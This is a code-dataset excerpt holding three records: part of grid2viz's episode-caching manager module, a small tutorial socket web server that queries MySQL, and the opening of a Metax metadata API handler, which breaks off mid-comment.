.max()\n .sort_index()\n )\n lines_in_maintenance = list(\n episode.maintenances[\"line_name\"][episode.maintenances.value == 1].unique()\n )\n\n graph = make_network_matplotlib(episode)\n\n # to color assets on our graph with different colors while not overloading it with information\n # we will use plot_obs instead of plot_info for now\n ####\n # For that we override an observation with the desired values\n obs_colored = episode.observations[timestep]\n\n # having a rho with value 0.1 give us a blue line while 0.5 gives us an orange line\n # line in maintenance would display as dashed lines\n rho_to_color = np.array(\n [\n float(0.0) if line in lines_in_maintenance else float(0.4)\n for line in episode.line_names\n ]\n )\n line_status_colored = np.array(\n [False if line in lines_in_maintenance else True for line in episode.line_names]\n )\n obs_colored.rho = rho_to_color\n obs_colored.line_status = line_status_colored\n\n obs_colored.load_p = np.array(max_loads.value)\n obs_colored.gen_p = np.array(max_gens.value)\n\n network_graph = graph.plot_obs(obs_colored, line_info=None)\n # network_graph=graph.plot_info(\n # #observation=episode.observations[0],\n # load_values=max_loads.values.flatten(),\n # load_unit=\"MW\",\n # gen_values=max_gens.values.flatten(),\n # gen_unit=\"MW\"\n # #line_values=[ 1 if line in lines_in_maintenance else 0 for line in episode.line_names],\n # #coloring=\"line\"\n # )\n\n return network_graph\n\n\nstore = {}\n\n\ndef make_episode(agent, episode_name,with_reboot=False):\n \"\"\"\n Load episode from cache. If not already in, compute episode data\n and save it in cache.\n\n :param agent: Agent Name\n :param episode_name: Name of the studied episode\n :return: Episode with computed data\n \"\"\"\n if is_in_ram_cache(episode_name, agent):\n episode=get_from_ram_cache(episode_name, agent)\n elif is_in_fs_cache(episode_name, agent):\n episode = get_from_fs_cache(episode_name, agent)\n save_in_ram_cache(episode_name, agent, episode)\n #to see evolution of ram footprint\n #from guppy import hpy\n #h = hpy()\n #print(h.heap())\n else:\n episode = compute_episode(episode_name, agent,with_reboot)\n save_in_ram_cache(episode_name, agent, episode)\n\n if(with_reboot and \"reboot\" not in dir(episode)):\n #in that case we need to reload the episode from episode data object\n episode_data = retrieve_episode_from_disk(episode_name, agent)\n episode.decorate_with_reboot(episode_data)\n save_in_ram_cache(episode_name, agent, episode)\n\n return episode\n\n\ndef make_episode_without_decorate(agent, episode_name,save=False):\n \"\"\"\n Load episode from cache without decorating with the EpisodeData attributes\n This is needed to use multiprocessing which pickles/unpickles the results.\n\n :param agent: Agent Name\n :param episode_name: Name of the studied episode\n :return: Episode with computed data (without EpisodeData attributes), EpisodeData instance\n \"\"\"\n if is_in_ram_cache(episode_name, agent):\n if save:\n return None\n return get_from_ram_cache(episode_name, agent)\n elif is_in_fs_cache(episode_name, agent):\n if save:\n return None\n beg = time.time()\n episode_analytics=get_from_fs_cache(episode_name, agent)\n return episode_analytics\n else:\n episode_data = retrieve_episode_from_disk(episode_name, agent)\n if episode_data is not None:\n episode_analytics = EpisodeAnalytics(episode_data, episode_name, agent)\n if save:\n episode_analytics.decorate_light_without_reboot(episode_data)\n save_in_fs_cache(episode_name, agent, episode_analytics)\n return None #to avoid problem with picklalisable issues in multiprocess\n return episode_analytics\n else:\n return None\n\n\ndef clear_fs_cache():\n os.rmdir(cache_dir)\n\n\ndef is_in_fs_cache(episode_name, agent):\n dill_path=get_fs_cached_file(episode_name, agent)\n is_in_fs_cache=(os.path.isfile(dill_path) | os.path.isfile(dill_path+\".bz\"))\n return is_in_fs_cache\n\n\ndef get_fs_cached_file(episode_name, agent):\n episode_dir = os.path.join(cache_dir, episode_name)\n if not os.path.exists(episode_dir):\n os.makedirs(episode_dir,exist_ok=True)\n return os.path.join(episode_dir, agent + \".dill\")\n\ndef save_in_fs_cache(episode_name, agent, episode):\n path = get_fs_cached_file(episode_name, agent)\n\n #####\n #to assess size of objects\n\n #from pympler import asizeof\n #total_size=asizeof.asizeof(episode)\n #for key,value in vars(episode).items():\n # print(key)\n # print(asizeof.asizeof(value))\n # print(int(asizeof.asizeof(value)/total_size*100))\n\n #import bz2\n #import zipfile\n #bz2.BZ2File('bz2_test.pbz2', 'wb') as f:\n with gzip.open(path+\".bz\", \"wb\") as f:\n #with zipfile.ZipFile.write(path+\".zip\") as f:\n #with open(path, \"wb\") as f:\n #dill.dump(episode, f, protocol=4)\n pickle.dump(episode, f, protocol=4)\n\n\n\ndef get_from_fs_cache(episode_name, agent):\n beg = time.time()\n path = get_fs_cached_file(episode_name, agent)\n print(f\"Loading from filesystem cache agent {agent} on scenario {episode_name}...\")\n\n start = time.time()\n\n if(os.path.exists(path + \".bz\")):\n\n with gzip.open(path + \".bz\", \"rb\") as f:\n # with zipfile.ZipFile.open(path + \".zip\") as f:\n print(path)\n episode_analytics=pickle.load(f)\n else:\n with open(path, \"rb\") as f:\n episode_analytics = pickle.load(f)\n\n ######\n #add observation_space only to decorate as it could not be saved in pickle\n agent_path = os.path.join(agents_dir, agent)\n episode_analytics.decorate_obs_act_spaces(agent_path)\n\n\n ##########\n ##Warning for compatibility with older cache version:\n if(\"observations\" not in dir(episode_analytics)):\n print(\"WARNING: the cache management have been updated in grid2viz 1.3.1 for faster loading. \"\n \"You Should delete the old _cache folder and recompute it with latest grid2viz version\")\n episode_analytics.optimize_memory_footprint(opt_obs_act=True)#this adds a bit of 25% loading time overhead,\n # in particular when resetting observations and actions, which only brings a 10% size decrease\n\n #episode_analytics.decorate(episode_data)\n #episode_analytics=decorate(episode_analytics,episode_data)\n\n end = time.time()\n print(\n f\"Agent {agent} on scenario {episode_name} loaded from filesystem cache in: {(end - beg):.1f} s\"\n )\n return episode_analytics\n\n\ndef compute_episode(episode_name, agent,with_reboot=False):\n print(f\"Loading from logs agent {agent} on scenario {episode_name}...\")\n beg = time.time()\n episode_data = retrieve_episode_from_disk(episode_name, agent)\n episode_analytics = EpisodeAnalytics(episode_data, episode_name, agent)\n if with_reboot:\n episode_analytics.decorate_with_reboot(episode_data)\n else:\n episode_analytics.decorate_light_without_reboot(episode_data)\n save_in_fs_cache(episode_name, agent, episode_analytics)\n episode_analytics.decorate_obs_act_spaces(os.path.join(agents_dir, agent))\n end = time.time()\n print(\n f\"Agent {agent} on scenario {episode_name} loaded from logs in: {(end - beg):.1f} s\"\n )\n return episode_analytics\n\n\ndef retrieve_episode_from_disk(episode_name, agent):\n path = os.path.join(agents_dir, agent)\n episode_path = os.path.abspath(os.path.join(path, episode_name))\n if os.path.isdir(episode_path):\n episode_data = EpisodeData.from_disk(path, episode_name)\n return episode_data\n else:\n return None\n\n\ndef is_in_ram_cache(episode_name, agent):\n return make_ram_cache_id(episode_name, agent) in store\n\n\ndef save_in_ram_cache(episode_name, agent, episode):\n store[make_ram_cache_id(episode_name, agent)] = episode\n\n\ndef get_from_ram_cache(episode_name, agent):\n return store[make_ram_cache_id(episode_name, agent)]\n\n\ndef make_ram_cache_id(episode_name, agent):\n return agent + episode_name\n\n\ndef check_all_tree_and_get_meta_and_best(base_dir, agents):\n best_agents = {}\n meta_json = {}\n scenarios = set()\n survival_dic = {}\n attention_dic = {}\n\n for agent in agents:\n survival_dic_agent = {}\n attention_dic_agent = {}\n for scenario_name in os.listdir(os.path.join(base_dir, agent)):\n\n scenario_folder = os.path.join(base_dir, agent, scenario_name)\n if not os.path.isdir(scenario_folder):\n continue\n with open(os.path.join(scenario_folder, \"episode_meta.json\")) as f:\n episode_meta = json.load(fp=f)\n meta_json[scenario_name] = episode_meta\n\n survival_dic_agent[scenario_name] = int(\n int(episode_meta[\"nb_timestep_played\"])\n * 100\n / int(episode_meta[\"chronics_max_timestep\"])\n )\n scenarios.add(scenario_name)\n\n if scenario_name not in best_agents:\n best_agents[scenario_name] = {\n \"value\": -1,\n \"agent\": None,\n \"out_of\": 0,\n \"cum_reward\": -1,\n }\n condition_to_update_best_agent = best_agents[scenario_name][\n \"value\"\n ] < episode_meta[\"nb_timestep_played\"] or (\n best_agents[scenario_name][\"value\"]\n == episode_meta[\"nb_timestep_played\"]\n and best_agents[scenario_name][\"cum_reward\"]\n < episode_meta[\"cumulative_reward\"]\n )\n if condition_to_update_best_agent:\n best_agents[scenario_name][\"value\"] = episode_meta[\n \"nb_timestep_played\"\n ]\n best_agents[scenario_name][\"agent\"] = agent\n best_agents[scenario_name][\"cum_reward\"] = episode_meta[\n \"cumulative_reward\"\n ]\n\n best_agents[scenario_name][\"out_of\"] = (\n best_agents[scenario_name][\"out_of\"] + 1\n )\n other_reward_json_path=os.path.join(scenario_folder, \"other_rewards.json\")\n if os.path.exists(other_reward_json_path):\n with open(other_reward_json_path) as f:\n other_reward_meta = json.load(fp=f)\n last_step_rewards=other_reward_meta[len(other_reward_meta) - 1]\n if 'attention_score' in last_step_rewards.keys():\n attention_dic_agent[scenario_name] = last_step_rewards['attention_score']\n f.close()\n\n\n survival_dic[agent] = survival_dic_agent\n attention_dic[agent] = attention_dic_agent\n\n scenarios=list(scenarios)#instead of set, to avoid type errors when using pandas for instance\n survival_df = pd.DataFrame(columns=agents, index=scenarios)\n attention_df = pd.DataFrame(columns=agents, index=scenarios)#, dtype=np.int64)\n for agent in agents:\n survival_dic_agent = survival_dic[agent]\n attention_dic_agent = attention_dic[agent]\n for (scenario, survival_time) in survival_dic_agent.items():\n survival_df.loc[scenario][agent] = survival_time\n if len(attention_dic_agent) != 0:\n for (scenario, attention_score) in attention_dic_agent.items():\n attention_df.loc[scenario][agent] = np.round(attention_score,2)\n\n survival_df = survival_df.fillna(-1) # To be able to cast as int below.\n survival_df = survival_df.astype(int)\n\n return meta_json, best_agents, survival_df, attention_df\n\ndef make_cache(scenarios,agents,n_cores,cache_dir,agent_selection=None):\n\n if(agent_selection is not None):\n agents=[agent for agent in agents if agent in agent_selection]\n\n from pathos.multiprocessing import ProcessPool\n\n if not os.path.exists(cache_dir):\n print(\"Starting Multiprocessing for reading the best agent of each scenario\")\n\n # TODO: tous les agents n'ont pas forcément tourner sur exactement tous les mêmes scenarios\n # Eviter une erreur si un agent n'a pas tourné sur un scenario\n agent_scenario_list = [\n (agent, scenario) for agent in agents for scenario in scenarios\n ]\n\n agents_data = []\n if n_cores == 1: # no multiprocess useful for debug if needed\n i = 0\n for agent_scenario in agent_scenario_list:\n agents_data.append(\n make_episode_without_decorate(agent_scenario[0], agent_scenario[1],save=True)\n )\n i += 1\n else:\n pool = ProcessPool(n_cores)\n list(\n pool.imap(\n make_episode_without_decorate,\n [agent_scenario[0] for agent_scenario in agent_scenario_list], # agents\n [agent_scenario[1] for agent_scenario in agent_scenario_list],\n [True for agent_scenario in agent_scenario_list],\n )\n ) # scenarios #we go over all agents and all scenarios for each agent\n pool.close()\n print(\"Multiprocessing done\")\n\n\n\"\"\"\nInitialisation routine\n\"\"\"\n\"\"\" Parsing of config file\"\"\"\nif not \"GRID2VIZ_ROOT\" in os.environ:\n #get grid2viz package path\n pkg_root_dir = os.getcwd()#os.path.dirname(os.path.abspath((os.path.join(os.path.abspath(__file__), os.pardir))))\n os.environ[\"GRID2VIZ_ROOT\"] = pkg_root_dir\n path_cfg = os.path.join(os.environ[\"GRID2VIZ_ROOT\"], \"config.ini\")\nelse:\n path_cfg = os.path.join(os.environ[\"GRID2VIZ_ROOT\"], \"config.ini\")\n\nparser = configparser.ConfigParser()\nprint(\n Fore.BLUE + Style.BRIGHT + \"The config file used is located at: {}\".format(path_cfg)\n)\nparser.read(path_cfg)\n\nagents_dir = parser.get(\"DEFAULT\", \"agents_dir\")\nprint(Fore.BLUE + \"Agents data used is located at: {}\".format(agents_dir))\ncache_dir = os.path.join(agents_dir, \"_cache\")\n\"\"\"Parsing of agent folder tree\"\"\"\nagents = sorted(\n [\n file\n for file in os.listdir(agents_dir)\n if os.path.isdir(os.path.join(agents_dir, file)) and not file.startswith(\"_\")\n ]\n)\nmeta_json, best_agents, survival_df, attention_df = check_all_tree_and_get_meta_and_best(\n agents_dir, agents\n)\nscenarios = []\nscenarios_agent = {}\nagent_scenario = {}\n\ntry:\n n_cores = int(parser.get(\"DEFAULT\", \"n_cores\"))\nexcept configparser.NoOptionError:\n n_cores = 1\n\nfor agent in agents:\n scen_path = os.path.join(agents_dir, agent)\n scens = [\n file\n for file in os.listdir(scen_path)\n if os.path.isdir(os.path.join(scen_path, file))\n ]\n scenarios_agent[agent] = scens\n for scen in scens:\n if scen not in agent_scenario:\n agent_scenario[scen] = []\n if agent not in agent_scenario[scen]:\n agent_scenario[scen].append(agent)\n scenarios = scenarios + scens\n\nscenarios = set(scenarios)\nenv_path = parser.get(\"DEFAULT\", \"env_dir\")\n# Create a .grid2viz directory in the user home directory\ngrid2viz_home_directory = Path.home() / \".grid2viz\"\ngrid2viz_home_directory.mkdir(parents=False, exist_ok=True)\n", "repo_name": "rte-france/grid2viz", "sub_path": "grid2viz/src/manager.py", "file_name": "manager.py", "file_ext": "py", "file_size_in_byte": 26555, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 35, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.Circle", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 57, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 57, "usage_type": "name"}, {"api_name": "scipy.spatial.ConvexHull", "line_number": 80, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 83, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 83, "usage_type": "name"}, {"api_name": "grid2op.PlotGrid.PlotPlotly", "line_number": 105, "usage_type": "call"}, {"api_name": "grid2op.PlotGrid.PlotMatplot", "line_number": 116, "usage_type": "call"}, {"api_name": "plotly.colors.sequential", "line_number": 171, "usage_type": "attribute"}, {"api_name": "plotly.colors", "line_number": 171, "usage_type": "name"}, {"api_name": "plotly.colors.sequential", "line_number": 172, "usage_type": "attribute"}, {"api_name": "plotly.colors", "line_number": 172, "usage_type": "name"}, {"api_name": "plotly.colors.sequential", "line_number": 173, "usage_type": "attribute"}, {"api_name": "plotly.colors", "line_number": 173, "usage_type": "name"}, {"api_name": "numpy.clip", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 180, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 208, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 208, "usage_type": "name"}, {"api_name": "itertools.chain.from_iterable", "line_number": 223, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 261, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 283, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 283, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 299, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 315, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 315, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 350, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 362, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 363, "usage_type": "call"}, {"api_name": "time.time", "line_number": 429, "usage_type": "call"}, {"api_name": "grid2viz.src.kpi.EpisodeAnalytics.EpisodeAnalytics", "line_number": 435, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 446, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 451, "usage_type": "call"}, {"api_name": "os.path", "line_number": 451, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 456, "usage_type": "call"}, {"api_name": "os.path", "line_number": 456, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 457, "usage_type": "call"}, {"api_name": "os.path", "line_number": 457, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 458, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path", "line_number": 459, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 477, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 481, "usage_type": "call"}, {"api_name": "time.time", "line_number": 486, "usage_type": "call"}, {"api_name": "time.time", "line_number": 490, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 492, "usage_type": "call"}, {"api_name": "os.path", "line_number": 492, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 494, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 497, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 500, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path", "line_number": 504, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 519, "usage_type": "call"}, {"api_name": "time.time", "line_number": 528, "usage_type": "call"}, {"api_name": "grid2viz.src.kpi.EpisodeAnalytics.EpisodeAnalytics", "line_number": 530, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 536, "usage_type": "call"}, {"api_name": "os.path", "line_number": 536, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 537, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 545, "usage_type": "call"}, {"api_name": "os.path", "line_number": 545, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 546, "usage_type": "call"}, {"api_name": "os.path", "line_number": 546, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 546, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 547, "usage_type": "call"}, {"api_name": "os.path", "line_number": 547, "usage_type": "attribute"}, {"api_name": "grid2op.Episode.EpisodeData.from_disk", "line_number": 548, "usage_type": "call"}, {"api_name": "grid2op.Episode.EpisodeData", "line_number": 548, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 580, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 580, "usage_type": "call"}, {"api_name": "os.path", "line_number": 580, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 582, "usage_type": "call"}, {"api_name": "os.path", "line_number": 582, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 583, "usage_type": "call"}, {"api_name": "os.path", "line_number": 583, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 585, "usage_type": "call"}, {"api_name": "os.path", "line_number": 585, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 586, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 623, "usage_type": "call"}, {"api_name": "os.path", "line_number": 623, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 624, "usage_type": "call"}, {"api_name": "os.path", "line_number": 624, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 626, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 637, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 638, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 646, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 660, "usage_type": "call"}, {"api_name": "os.path", "line_number": 660, "usage_type": "attribute"}, {"api_name": "pathos.multiprocessing.ProcessPool", "line_number": 678, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 695, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 697, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 698, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 699, "usage_type": "call"}, {"api_name": "os.path", "line_number": 699, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 699, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 701, "usage_type": "call"}, {"api_name": "os.path", "line_number": 701, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 701, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 703, "usage_type": "call"}, {"api_name": "colorama.Fore.BLUE", "line_number": 705, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 705, "usage_type": "name"}, {"api_name": "colorama.Style.BRIGHT", "line_number": 705, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 705, "usage_type": "name"}, {"api_name": "colorama.Fore.BLUE", "line_number": 710, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 710, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 711, "usage_type": "call"}, {"api_name": "os.path", "line_number": 711, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 716, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 717, "usage_type": "call"}, {"api_name": "os.path", "line_number": 717, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 717, "usage_type": "call"}, {"api_name": "configparser.NoOptionError", "line_number": 729, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 733, "usage_type": "call"}, {"api_name": "os.path", "line_number": 733, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 736, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 737, "usage_type": "call"}, {"api_name": "os.path", "line_number": 737, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 737, "usage_type": "call"}, {"api_name": "pathlib.Path.home", "line_number": 750, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 750, "usage_type": "name"}]}
+{"seq_id": "6064377675", "text": "\"\"\"\nhttp协议 --> 应用层协议\n浏览器会默认的加上80端口号\n\n# 1. 识别不同的网址 --> 返回不同的页面\n# 2. 能够加载外部的html文件进来\n# 3. 服务器去链接数据库\n# 4. 注册功能 --> 插入一条数据到mysql中\n# 5. 登陆功能 --> 在数据库中查询 在注册的时候插入的账户密码是否匹配\n# 6. 保持登陆 --> cookie 或者 session\n\"\"\"\nimport socket\nimport pymysql\n#tcp和ip协议\nclass WebServer:\n def __init__(self):\n self.ss = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n #重启的时候 不用去改端口号\n self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n #绑定ip地址和端口号\n self.ss.bind(('10.2.0.26',10081))\n self.ss.listen(10)\n\n\n def run(self):\n conn,addr = self.ss.accept()\n msg = conn.recv(1024)\n url = self.get_url(msg)\n res = self.url_header(url)\n response_header = \"HTTP/1.1 200 OK\\r\\nContent-Type: text/html\\r\\n\" \\\n \"Connection: Closed\\r\\n\\r\\n\"\n\n with open(res,'r') as f:\n response_body = f.read()\n conn.send((response_header+response_body).encode())\n\n mysql_conn = self.mysql_conn()\n\n cursor = mysql_conn.cursor()\n\n sql ='select * from user'\n cursor.execute(sql)\n\n res = mysql_conn.commit()\n\n print(res)\n\n\n\n def url_header(self,url):\n if url == b'/':\n return 'test2.html'\n if url == b'/p1904':\n return 'tset.html'\n\n return '404.html'\n def get_url(self,msg):\n msg_list = msg.split()\n return msg_list[1]\n\n def mysql_conn(self):\n conn = pymysql.connect(\n host='10.2.0.26',\n user ='p1904', password ='p1904_123',\n database ='my_web',\n charset ='utf8')\n\n return conn\n\n\n\nif __name__ == '__main__':\n s = WebServer()\n s.run()\n", "repo_name": "JwangTec/python_resources", "sub_path": "django/web_server.py", "file_name": "web_server.py", "file_ext": "py", "file_size_in_byte": 1905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "socket.socket", "line_number": 17, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 17, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 17, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 19, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pymysql.connect", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "33461524602", "text": "\"\"\"Class for handling calls to METAX API.\n\nAPI docs https://metax.fairdata.fi/docs/\nSwagger https://metax.fairdata.fi/swagger/v2\n\"\"\"\nimport time\nfrom typing import Any\n\nfrom aiohttp import BasicAuth, web\nfrom aiohttp.client_exceptions import ClientConnectorError, InvalidURL\nfrom yarl import URL\n\nfrom ..conf.conf import metax_config\nfrom ..helpers.logger import LOG\nfrom .metax_mapper import MetaDataMapper, SubjectNotFoundException\nfrom .service_handler import ServiceHandler\n\n\nclass MetaxServiceHandler(ServiceHandler):\n \"\"\"API handler for uploading submitters' metadata to METAX service.\"\"\"\n\n service_name = \"Metax\"\n\n def __init__(self) -> None:\n \"\"\"Define variables and paths.\n\n Define variables and paths used for connecting to Metax API and\n default inputs for Metax Dataset creation.\n\n :param req: HTTP request from calling service\n \"\"\"\n metax_url = URL(metax_config[\"url\"])\n super().__init__(\n base_url=metax_url / metax_config[\"rest_route\"][1:],\n auth=BasicAuth(metax_config[\"username\"], metax_config[\"password\"]),\n )\n\n self.connection_check_url = metax_url\n self.publish_route = metax_url / metax_config[\"publish_route\"][1:]\n\n self.minimal_dataset_template: dict[Any, Any] = {\n \"data_catalog\": metax_config[\"catalog_pid\"],\n \"metadata_provider_org\": \"csc.fi\",\n \"research_dataset\": {\n # submitter given DOI\n \"preferred_identifier\": \"\",\n \"title\": {\"en\": \"\"},\n # study abstract or dataset description\n \"description\": {\"en\": \"\"},\n # default\n \"access_rights\": {\n \"access_type\": {\n \"in_scheme\": \"http://uri.suomi.fi/codelist/fairdata/access_type\",\n \"identifier\": \"http://uri.suomi.fi/codelist/fairdata/access_type/code/restricted\",\n }\n },\n # default\n \"publisher\": {\n \"name\": {\n \"en\": \"CSC Sensitive Data Services for Research\",\n \"fi\": \"CSC:n Arkaluonteisen datan palveluiden aineistokatalogi\",\n },\n \"@type\": \"Organization\",\n },\n },\n }\n\n async def _get(self, metax_id: str) -> dict[str, Any]:\n result: dict[str, Any] = await self._request(method=\"GET\", path=metax_id)\n LOG.info(\"Got metax dataset with ID: %r.\", metax_id)\n\n return result\n\n async def _post_draft(self, json_data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Post call to Metax REST API.\n\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"POST\", json_data=json_data, params=\"draft\")\n LOG.info(\"Created Metax draft dataset with ID: %r.\", result[\"identifier\"])\n\n return result\n\n async def _put(self, metax_id: str, json_data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Put call to Metax REST API.\n\n :param metax_id: ID of dataset to be updated\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"PUT\", path=metax_id, json_data=json_data)\n LOG.info(\"Metax dataset with ID: %r updated.\", metax_id)\n\n return result\n\n async def _patch(self, metax_id: str, json_data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Patch call to Metax REST API.\n\n :param metax_id: ID of dataset to be updated\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"PATCH\", path=metax_id, json_data=json_data)\n LOG.info(\"Patch completed for metax dataset with ID: %r.\", metax_id)\n\n return result\n\n async def _bulk_patch(self, json_data: list[dict[str, Any]]) -> dict[str, Any]:\n \"\"\"Bulk patch call to Metax REST API.\n\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"PATCH\", json_data=json_data)\n LOG.info(\"Bulk patch completed for metax datasets\")\n\n return result\n\n # async def _delete_draft(self, metax_id: str) -> None:\n # \"\"\"Delete draft dataset from Metax service.\n #\n # :param metax_id: Identification string pointing to Metax dataset to be deleted\n # \"\"\"\n # await self._request(method=\"DELETE\", path=metax_id)\n # LOG.debug(\"Deleted draft dataset metax ID: %r from Metax service\", metax_id)\n\n async def _publish(self, metax_id: str) -> str:\n \"\"\"Post a call to Metax RPC publish endpoint.\n\n :param metax_id: ID of dataset to be updated\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(\n method=\"POST\", url=self.publish_route, params={\"identifier\": metax_id}\n )\n LOG.info(\"Metax ID %s was published to Metax service.\", metax_id)\n\n dataset: str = result[\"preferred_identifier\"]\n return dataset\n\n async def post_dataset_as_draft(self, external_id: str, collection: str, data: dict[str, Any]) -> str:\n \"\"\"Send draft dataset to Metax.\n\n Construct Metax dataset data from submitters' Study or Dataset and\n send it as new draft dataset to Metax Dataset API.\n\n :param external_id: external user id, from OIDC provider\n :param collection: Schema of incoming submitters' metadata\n :param data: Validated Study or Dataset data dict\n :raises: HTTPError depending on returned error from Metax\n :returns: Metax ID for dataset returned by Metax API\n \"\"\"\n LOG.debug(\n \"Creating draft dataset to Metax service from collection: %r with accession ID: %r.\",\n collection,\n {data[\"accessionId\"]},\n )\n await self.check_connection()\n metax_dataset = self.minimal_dataset_template\n metax_dataset[\"metadata_provider_user\"] = external_id\n if collection == \"dataset\":\n dataset_data = self.create_metax_dataset_data_from_dataset(data)\n else:\n dataset_data = self.create_metax_dataset_data_from_study(data)\n metax_dataset[\"research_dataset\"] = dataset_data\n\n metax_data = await self._post_draft(metax_dataset)\n LOG.debug(\n \"Created Metax draft dataset for: %r with accession ID: %r with data: %r.\",\n collection,\n data[\"accessionId\"],\n metax_data,\n )\n metax_id: str = metax_data[\"identifier\"]\n # Metax service overwrites preferred id (DOI) with temporary id for draft datasets\n # Patching dataset with full research_dataset data updates preferred id to the real one\n LOG.debug(\"Updating Metax draft dataset with ID: %r with permanent preferred identifier.\", metax_id)\n await self._patch(metax_id, {\"research_dataset\": dataset_data})\n return metax_id\n\n # async def update_draft_dataset(self, external_id: str, collection: str, data: Dict) -> None:\n # \"\"\"Update draft dataset to Metax.\n #\n # Construct Metax draft dataset data from submitters' Study or Dataset and\n # send it to Metax Dataset API for update.\n #\n # :param external_id: external user id, from OIDC provider\n # :param collection: Schema of incoming submitters' metadata\n # :param data: Validated Study or Dataset data dict\n # :raises: HTTPError depending on returned 